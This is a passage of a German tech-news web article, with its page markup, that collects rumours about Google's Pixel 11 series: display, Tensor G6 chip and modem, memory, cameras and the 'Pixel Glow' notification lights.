<p>Die einzige Neuigkeit, die uns hierzu vorliegt, ist, dass Google für die Pixel-11-Reihe <a href="https://m.etnews.com/20260409000346" target="_blank" rel="noreferrer noopener">angeblich das Spitzenmodell M16 OLED-Panel von Samsung Display verwenden wird</a>, womit es den iPhone-18-Pro-Modellen (und auch den Galaxy-Modellen von Samsung Mobile) zuvorkommen wird.</p>



<p>Es liegen zwar noch kaum Details vor, doch das Panel dürfte in puncto Helligkeit, Farbwiedergabe, Lebensdauer und Energieeffizienz das Beste bieten.</p>



<p>Sollte Google die Displaygröße im Vergleich zur Pixel-10-Serie nicht ändern, gelten für die Pixel-10-Modelle folgende Spezifikationen:</p>



<ul class="wp-block-list">
<li>Pixel 10: 6,3-Zoll-Actua-OLED, 3.000 Nits</li>



<li>Pixel 10 Pro: 6,3-Zoll-Super-Actua-LTPO-OLED, 3.300 Nits</li>



<li>Pixel 10 Pro XL: 6,8-Zoll-Super-Actua-LTPO-OLED, 3.300 Nits</li>



<li>Pixel 10 Pro Fold: 8-Zoll-Super-Actua-Flex-LTPO-OLED, 3.000 Nits</li>
</ul>



<p>Angesichts der aktuellen Trends könnte die Pixel-11-Serie die derzeitige Obergrenze von 120 Hertz bei der Bildwiederholfrequenz überschreiten und so flüssigeres Scrollen sowie reaktionsschnellere Interaktionen ermöglichen.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b80cc"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/google-pixel-10-pro-xl-3.jpg?quality=50&amp;strip=all&amp;w=1200" alt="google pixel 10 pro xl 3" class="wp-image-2884902" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Der Bildschirm des Pixel 11 Pro XL</figcaption></figure><p class="imageCredit">Anyron Copeman / Foundry</p></div>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-2 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF2"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-2 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Leistung</h3>



<p>Google wird bei der Pixel-11-Reihe mit dem Tensor G6 auf einen neuen Chipsatz umsteigen. Auch wenn dies für niemanden eine Überraschung sein dürfte (ein neuer Tensor-Chip ist seit Jahren ein fester Bestandteil jeder neuen Generation), gibt es dieses Mal einige Verbesserungen, die einen enormen Einfluss auf die Leistung haben könnten.</p>



<p>Eine der ersten Informationen, auf die wir stießen, stammt noch aus der Zeit, bevor das Pixel 10 überhaupt in den Handel kam: Einem <a href="https://x.com/dnystedt/status/1936955306397086001" target="_blank" rel="noreferrer noopener">Bericht</a> zufolge soll der neue Tensor G6 im effizienteren 2-Nanometer-Verfahren hergestellt werden, was erhebliche Auswirkungen auf die alltägliche Leistungsfähigkeit der CPU haben könnte.</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">Google’s Tensor G6 smartphone chip will be made with TSMC’s 2nm production process, media report, citing unnamed supply chain sources, and adding the Tensor G5 was transferred to TSMC from Samsung and will be inside Pixel smartphones later this year. Meanwhile, Tesla’ AI 5 chips…</p>— Dan Nystedt (@dnystedt) <a href="https://x.com/dnystedt/status/1936955306397086001?ref_src=twsrc%5Etfw">June 23, 2025</a></blockquote>
</div></figure>



<p>Geht man noch einen Schritt weiter, scheint es nun so, als würde Google auf <a href="https://t.me/mysticleaks/161?comment=48458">den neuesten C1-Ultra-Kern von Arm</a> umsteigen, der eine Taktrate von 4,11 GHz erreichen kann. Zum Vergleich: Das entspricht der Taktrate des Mediatek Dimensity 9500, der das Super-Flaggschiff <a href="https://www.pcwelt.de/article/2967222/oppo-find-x9-pro-test.html" target="_blank" rel="noreferrer noopener">Oppo Find X9 Pro</a> antreibt.</p>



<p>Angesichts der Tatsache, wie stark Google die KI-Verarbeitung auf dem Gerät selbst vorantreibt, könnte ein effizienterer Tensor-Chip Google in Zukunft auch mehr Spielraum für komplexere KI-gesteuerte Aufgaben bieten.</p>



<p>Ein weiterer <a href="https://t.me/mysticleaks/144" target="_blank" rel="noreferrer noopener">Bericht</a> deutet darauf hin, dass Google neben dem Tensor G6 von einem Modem der Marke Samsung (was bislang die Regel war) auf ein von Mediatek hergestelltes Modem umsteigen wird.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b884e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-29.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 29" class="wp-image-2454265" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Bei dem betreffenden Modem handelt es sich um das MediaTek M90, das eine Reihe bemerkenswerter Funktionen bietet, darunter die Unterstützung von Sub-6- und mmWave-5G-Daten sowie Satellitenkonnektivität. </p>



<p>Die Möglichkeit, in Notfällen eine Satellitenverbindung herzustellen, ist mittlerweile eine allgemein erwartete Funktion bei Flaggschiff-Smartphones, nachdem Apple mit „Emergency SOS“ diesen Trend ins Leben gerufen hat; daher ist es naheliegend, dass Google hier der Konkurrenz einen Schritt voraus sein möchte.</p>



<p>Erwähnenswert ist auch, dass das Modem von Mediatek in Kombination mit dem Tensor G6 energieeffizienter sein könnte, was den Weg für eine längere Akkulaufzeit ebnet. Wir werden es erst mit Sicherheit wissen, wenn wir die Pixel-11-Smartphones zum Testen in die Hände bekommen, aber es ist eine schöne Vorstellung – zumal einige der Pixel-10-Modelle in diesem Bereich nicht gerade glänzen.</p>



<p>Ein bedauerliches Gerücht, das zunehmend an Bedeutung gewinnt, besagt, dass Google dem derzeit von Unternehmen wie Apple und Samsung gesetzten Trend nicht folgen wird, das 128-GB-Modell zugunsten eines 256-GB-Basismodells wegzulassen – was einer unserer größten Kritikpunkte an den bestehenden Pixel-10-Smartphones war.</p>



<p>128 GB Speicherplatz reichen im Jahr 2026 angesichts von Fotos, Videos und unverzichtbaren Apps einfach nicht mehr aus, daher hoffen wir aufrichtig, dass sich dieses Gerücht nicht bewahrheitet, doch es könnte letztendlich ein Ausschlusskriterium für High-End-Nutzer sein, die mehr Speicherplatz wünschen, ohne hohe Summen für ein teureres Modell oder einen Cloud-Abonnementdienst zahlen zu müssen.</p>



<p>Erschwerend kommt hinzu, dass die neuesten Gerüchte zum Pixel 11 nun darauf hindeuten, dass zwar die CPU-Leistung besser sein soll als zuvor, die neue GPU jedoch gar nicht so neu sein wird, da stattdessen ein PowerVR CXTP-48-1536 zum Einsatz kommen soll, der bereits im Jahr 2021 auf den Markt kam.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b8e1f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Pixel-10-Pro-Fold-review-18.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Pixel 10 Pro Fold review 18" class="wp-image-2931715" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Auch wenn die PowerVR-GPU möglicherweise eine leichte Leistungssteigerung gegenüber der Pixel-10-Reihe bietet, wäre dies dennoch eine große Enttäuschung, sollte sich dies bestätigen, da damit die derzeit an der Tensor G5 geäußerte Kritik ignoriert wird. Die Gaming-Leistung auf jedem Pixel-10-Smartphone entspricht einfach nicht dem Standard, den man von einem Flaggschiff-Gerät erwarten würde – die neuesten <a href="https://www.pcwelt.de/article/3108173/samsung-galaxy-s26-test.html" target="_blank" rel="noreferrer noopener">Galaxy-S26-Modelle</a> sind ihnen dabei weit überlegen. Für die Gamer unter Ihnen könnte es sich lohnen, sich bei Ihrem nächsten Upgrade anderweitig umzusehen.</p>



<p>Interessant ist, dass – sicherlich als Reaktion auf die aktuelle Speicherkrise, die durch die KI-Entwicklung angeheizt wird – das Pixel 11 Pro und Pro XL nun offenbar mit zwei verschiedenen RAM-Varianten ausgeliefert werden sollen: eine mit 12 GB und die andere mit den üblichen 16 GB.</p>



<p>Zum Hintergrund: 16 GB RAM sind seit dem Pixel 9 Pro der Standard bei Googles Pixels der Pro-Klasse; dass das Unternehmen nun bei einer so zentralen Spezifikation einen Rückzieher macht, sagt viel über den aktuellen Stand der Branche aus. Dies könnte bedeuten, dass die 12-GB-Variante notwendig ist, um das 11 Pro und das Pro XL weiterhin zum gleichen Preis wie ihre Vorgängermodelle anbieten zu können.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-3 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF3"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-3 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Kameras</h3>



<p>Die Kameraausstattung der Pixel-11-Serie entwickelt sich zu einer der fortschrittlichsten, die es bei einem Flaggschiff-Smartphone gibt, wobei Google sowohl Hardware als auch KI nutzt, um die Foto- und Videoqualität zu verbessern.</p>



<p>Eines der herausragenden Merkmale, das vom Pixel 11 <a href="https://www.androidauthority.com/google-pixel-10-and-pixel-11-camera-ai-features-3494468/" target="_blank" rel="noreferrer noopener">erwartet </a>wird, ist ein Teleobjektiv der nächsten Generation, das einen bis zu 100-fachen Zoom unterstützt. Diese beeindruckende Zoomfähigkeit, unterstützt durch Algorithmen des maschinellen Lernens im Tensor-G6-Prozessor von Google, könnte darauf abzielen, ähnliche Funktionen von Wettbewerbern wie Samsung zu übertreffen oder ihnen sogar den Rang abzulaufen.</p>



<p>Der 100-fache Zoom ermöglicht es Nutzern, selbst aus großer Entfernung bemerkenswert detailreiche Bilder und Videos aufzunehmen, und setzt damit einen neuen Maßstab für die Zoomqualität von Smartphones. Wir wissen, dass einige der Pixel-10-Modelle einen 100-fachen Super-Res-Zoom bieten; das Pixel 11 dürfte diesem Standard daher mindestens entsprechen.</p>



<p>Außerdem haben wir gesehen, dass das reguläre Pixel 10 ein Teleobjektiv erhalten hat, wenn auch nicht in derselben Qualität wie die Pro-Modelle. Auch hier könnte eine Dreifach-Kamera auf der Rückseite nun zum Standard für Pixel-Smartphones werden.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b9642"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/Google-Pixel-10-Lemongrass-2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 10 Lemongrass 2" class="wp-image-2883754" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Martin / Foundry</p></div>



<p>Gerüchten zufolge soll das Pixel 11 zudem über einen verbesserten „Cinematic Blur“-Modus verfügen, der den immersiven „Bokeh“-Effekt in Videos verstärkt. Diese Funktion wird voraussichtlich 4K-Videos mit 30 Bildern pro Sekunde unterstützen und so eine kinoreife Qualität bieten, die das Storytelling in Videos auf ein neues Niveau hebt.</p>



<p>Darüber hinaus könnte eine neue „Video Relight“-Option eingeführt werden, mit der Nutzer die Lichtverhältnisse innerhalb eines aufgenommenen Videos anpassen können, um in Echtzeit Lichtveränderungen zu simulieren und den Szenen so mehr Tiefe und Dramatik zu verleihen. Diese Funktion wird Berichten zufolge von der „Cinematic Rendering Engine“ im Tensor G6 unterstützt, wodurch der Stromverbrauch, der typischerweise mit unscharfen Videoaufnahmen verbunden ist, erheblich reduziert wird.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b9b4c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-27.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 27" class="wp-image-2454276" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Eine weitere spannende Neuerung ist der „Ultra Low Light Video“-Modus, auch als „Night Sight Video“ bezeichnet, der darauf ausgelegt ist, die Videoqualität bei schlechten Lichtverhältnissen zu verbessern.</p>



<p>Im Gegensatz zu früheren „Night Sight“-Videomodi, die eine Cloud-Verarbeitung erforderten, soll diese Funktion dank der fortschrittlichen Bildverarbeitungsfähigkeiten des Tensor-G6-Chips vollständig auf dem Gerät selbst ausgeführt werden.</p>



<p><a href="https://www.androidauthority.com/google-pixel-10-and-pixel-11-camera-ai-features-3494468/" target="_blank" rel="noreferrer noopener">Android Authority</a> berichtet, dass Google den „Ultra Low Light Video“-Modus so konzipiert hat, dass er in Umgebungen mit einer Umgebungshelligkeit zwischen 5 und 10 Lux – was in etwa der Helligkeit eines schwach beleuchteten Raums oder von Kerzenlicht entspricht – optimale Ergebnisse liefert.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4ba090"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro_review_13.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro review 13" class="wp-image-2457629" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Dominik Tomaszewski / Foundry</p></div>



<p>Durch die vollständige Verlagerung dieses Prozesses auf das Gerät könnte die Pixel-11-Serie ihren Nutzern die Möglichkeit bieten, hellere und klarere Videos bei schlechten Lichtverhältnissen aufzunehmen, ohne dass eine Internetverbindung erforderlich ist.</p>



<p>Obwohl konkrete Angaben zu den Objektiven dieser neuen Smartphones noch rar sind, scheint es nun wahrscheinlich, dass das Pixel 11 und das Pixel 11 Pro Fold über ein völlig neues 50-Megapixel-Hauptobjektiv verfügen werden, während das 11 Pro und das 11 Pro XL ein anderes, aber ebenfalls neues 50-Megapixel-Hauptobjektiv sowie ein verbessertes Teleobjektiv gemeinsam nutzen werden.</p>



<p>Sollten sich diese Gerüchte bestätigen, könnte die Kameraausstattung insgesamt einen deutlichen Qualitätssprung verzeichnen, was den neuen Pixel-Modellen sicherlich dabei helfen würde, sich von den aktuellen Kamera-Favoriten von Oppo, Vivo und Xiaomi abzuheben.</p>



<h3 class="wp-block-heading">Pixel 11: Funktionen, darunter „Pixel Glow“</h3>



<p>Eine wachsende Flut von <a href="https://9to5google.com/2026/04/16/pixel-glow-laptop/" target="_blank" rel="noreferrer noopener">Gerüchten</a> deutet darauf hin, dass Google eine eigene Version der „Glyph“-Leuchten von Nothing einführen will, bekannt als „Pixel Glow“. Da uns die bereits erwähnten Renderings vorliegen, ist natürlich klar, dass das Konzept nicht genau dieselbe Designphilosophie verfolgen wird, die bei den Nothing-Smartphones eher weitläufig umgesetzt ist, sondern vielmehr die Idee, bestimmte Benachrichtigungen durch Lichter anzuzeigen, wenn das Smartphone mit der Vorderseite nach unten liegt.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4ba684"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/03/PXL_20250310_111828487.jpg?quality=50&amp;strip=all&amp;w=1200" alt="PXL 20250310 111828487" class="wp-image-2632982" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Die Existenz einer solchen Funktion wurde in einer Beta-Version von Android 17 entdeckt, wobei in den begleitenden Hinweisen erläutert wird, dass die Funktion „durch dezente Licht- und Farbsignale auf der Rückseite Ihres Geräts Sie über wichtige Aktivitäten informiert“. Es ist anzunehmen, dass sich „Pixel Glow“ – basierend auf dem, was wir vom Design des Pixel 11 gesehen haben – entweder auf den Blitzbereich des leicht überarbeiteten Kameraausstellers oder auf das Google-„G“-Logo in der Mitte beschränken wird; wir tippen jedoch auf Ersteres, da in den Hinweisen auch erwähnt wird, dass aktivierte Blitzbenachrichtigungen „Pixel Glow“ vollständig außer Kraft setzen.</p>



<p>Es ist auf jeden Fall eine coole Funktion, da sie manchen Menschen helfen könnte, einen gesünderen Umgang mit ihrem Smartphone zu pflegen. Genau wie bei den „Nothing Glyphs“ sollen diese lichtbasierten Benachrichtigungen Sie nur auf wirklich wichtige Angelegenheiten aufmerksam machen, sodass Sie weniger dazu neigen, sofort durch Ihr Smartphone zu scrollen, sobald eine Benachrichtigung auf dem Bildschirm erscheint.</p>



<p>Da die Funktion mehrfarbige Lichter nutzen wird, ist davon auszugehen, dass Sie bestimmte Benachrichtigungen farblich kennzeichnen können, sodass Sie auf einen Blick genau erkennen, was das Smartphone Ihnen mitteilen möchte – sei es ein eingehender Anruf oder eine Lieferbenachrichtigung.</p>



<p>Google scheint von den Fähigkeiten von „Pixel Glow“ ziemlich überzeugt zu sein, da die Beta-Version auch darauf hindeutet, dass das Konzept in einem kommenden Laptop zum Einsatz kommen wird. Seitdem wurden <a href="https://blog.google/products-and-platforms/platforms/android/meet-googlebook/" target="_blank" rel="noreferrer noopener">Googlebooks mit einer „Glowbar“ angekündigt</a>, was uns eine Art Vorschau darauf gibt, wie dies beim Pixel 11 aussehen könnte.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4baba8"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Pixel-11-teaser-Glow.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3145379" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Google</p></div>



<p>Ein kleiner Vorgeschmack darauf, wie die Idee aussehen könnte, war im Rahmen der Google I/O 2026 zu sehen, wo wir ganz kurz einen Lichtring um ein Pixel 10 Pro XL erkennen konnten. Es ist bestenfalls flüchtig, wirkt aber wie ein möglicher Vorgeschmack von Google darauf, was uns erwartet – auch wenn es Teil eines KI-Abschnitts war, in dem nicht viel real war.</p>



<p>Wir haben Gemini gebeten, ein Konzeptbild für „Pixel Glow“ zu erstellen, und die Ergebnisse sind recht interessant. Nach mehreren Eingabeaufforderungen gelang es uns, Googles charakteristische Farben um die Kameraleiste herum erscheinen zu lassen, und obwohl es sich nach wie vor nur um eine Visualisierung einer möglichen Zukunft handelt, spricht definitiv einiges dafür, dass dies der Rückseite des Smartphones ein zusätzliches Flair verleiht.</p>



<p>Eine andere Möglichkeit wäre, dass es Teil des „G“-Logos ist, doch wir halten dies für weniger wahrscheinlich.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bb05e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Pixel-11-with-camera-bar-Pixel-Glow-lights-by-Gemini.png?w=805" alt="Pixel 11 with camera bar Pixel Glow lights by Gemini" class="wp-image-3137669" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Martin / Foundry</p></div>



